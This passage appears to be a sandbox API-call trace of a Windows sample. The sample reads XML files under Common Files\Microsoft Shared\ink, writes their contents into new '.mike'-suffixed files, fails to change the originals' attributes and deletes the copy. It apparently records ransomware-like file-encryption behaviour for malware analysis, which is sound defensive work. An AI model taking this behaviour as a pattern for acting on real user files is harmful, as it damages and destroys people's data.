lpFilePart=0x0) returned 0x3c [0043.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.700] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.701] GetFileType (hFile=0x264) returned 0x1 [0043.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.701] GetFileType (hFile=0x264) returned 0x1 [0043.701] CloseHandle (hObject=0x264) returned 1 [0043.701] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpFilePart=0x0) returned 0x3c [0043.701] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpFilePart=0x0) returned 0x3c [0043.701] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.701] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.701] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), fInfoLevelId=0x0, lpFileInformation=0x215f770 | out: lpFileInformation=0x215f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c6fece, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c6fece, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa12)) returned 1 [0043.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.701] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpFilePart=0x0) returned 0x3c [0043.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.702] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), fInfoLevelId=0x0, lpFileInformation=0x215fa5c | out: lpFileInformation=0x215fa5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c6fece, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c6fece, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa12)) returned 1 [0043.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.702] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpFilePart=0x0) returned 0x3c [0043.702] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", lpFilePart=0x0) returned 0x41 [0043.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.702] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.702] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpFilePart=0x0) returned 0x3c [0043.702] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpFilePart=0x0) returned 0x3c [0043.702] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpFilePart=0x0) returned 0x3c [0043.702] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", lpFilePart=0x0) returned 0x41 [0043.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0043.702] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0043.703] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", lpFilePart=0x0) returned 0x41 [0043.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.703] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.703] GetFileType (hFile=0x264) returned 0x1 [0043.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.703] GetFileType (hFile=0x264) returned 0x1 [0043.703] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.703] WriteFile (in: hFile=0x264, lpBuffer=0x2160788*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2160788*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.704] CloseHandle (hObject=0x264) returned 1 [0043.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0043.704] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), fInfoLevelId=0x0, lpFileInformation=0x21602d8 | out: lpFileInformation=0x21602d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c6fece, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c6fece, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa12)) returned 1 [0043.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0043.705] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpFilePart=0x0) returned 0x3c [0043.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.705] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.705] GetFileType (hFile=0x264) returned 0x1 [0043.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.705] GetFileType (hFile=0x264) returned 0x1 [0043.705] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.705] ReadFile (in: hFile=0x264, lpBuffer=0x2161898, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2161898*, lpNumberOfBytesRead=0x2af0c8*=0xa12, lpOverlapped=0x0) returned 1 [0043.706] CloseHandle (hObject=0x264) returned 1 [0043.707] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", lpFilePart=0x0) returned 0x41 [0043.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.707] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.707] GetFileType (hFile=0x264) returned 0x1 [0043.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.707] GetFileType (hFile=0x264) returned 0x1 [0043.707] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.707] WriteFile (in: hFile=0x264, lpBuffer=0x21683d0*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21683d0*, lpNumberOfBytesWritten=0x2af0bc*=0xa20, lpOverlapped=0x0) returned 1 [0043.708] CloseHandle (hObject=0x264) returned 1 [0043.708] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", lpFilePart=0x0) returned 0x41 [0043.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0043.708] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.708] GetFileType (hFile=0x264) returned 0x1 [0043.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0043.708] GetFileType (hFile=0x264) returned 0x1 [0043.709] WriteFile (in: hFile=0x264, lpBuffer=0x216b5e0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x216b5e0*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.710] CloseHandle (hObject=0x264) returned 1 [0043.710] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpFilePart=0x0) returned 0x3c [0043.710] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", lpFilePart=0x0) returned 0x41 [0043.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.710] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4410b60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4410b60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4410b60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc40)) returned 1 [0043.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.710] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpFilePart=0x0) returned 0x3c [0043.711] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", lpFilePart=0x0) returned 0x41 [0043.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.711] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x216cc84 | out: lpFileInformation=0x216cc84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4410b60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4410b60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4410b60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc40)) returned 1 [0043.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.711] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpFilePart=0x0) returned 0x3c [0043.711] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", dwFileAttributes=0x80) returned 0 [0043.712] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpFilePart=0x0) returned 0x3c [0043.712] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", lpFilePart=0x0) returned 0x41 [0043.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.712] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4410b60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4410b60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4410b60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc40)) returned 1 [0043.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.712] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml", lpFilePart=0x0) returned 0x3c [0043.712] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike", lpFilePart=0x0) returned 0x41 [0043.712] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsen.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsen.xml.mike")) returned 1 [0043.713] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpFilePart=0x0) returned 0x3d [0043.713] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpFilePart=0x0) returned 0x3d [0043.713] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpFilePart=0x0) returned 0x3d [0043.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.714] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.715] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpFilePart=0x0) returned 0x3d [0043.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.715] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.715] GetFileType (hFile=0x264) returned 0x1 [0043.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.715] GetFileType (hFile=0x264) returned 0x1 [0043.715] CloseHandle (hObject=0x264) returned 1 [0043.715] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpFilePart=0x0) returned 0x3d [0043.716] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpFilePart=0x0) returned 0x3d [0043.716] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.716] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.716] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), fInfoLevelId=0x0, lpFileInformation=0x216ebd0 | out: lpFileInformation=0x216ebd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbd0)) returned 1 [0043.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.716] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpFilePart=0x0) returned 0x3d [0043.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.716] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), fInfoLevelId=0x0, lpFileInformation=0x216eec0 | out: lpFileInformation=0x216eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbd0)) returned 1 [0043.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.716] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpFilePart=0x0) returned 0x3d [0043.716] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike", lpFilePart=0x0) returned 0x42 [0043.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.716] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.717] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpFilePart=0x0) returned 0x3d [0043.717] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpFilePart=0x0) returned 0x3d [0043.717] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml", lpFilePart=0x0) returned 0x3d [0043.717] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common 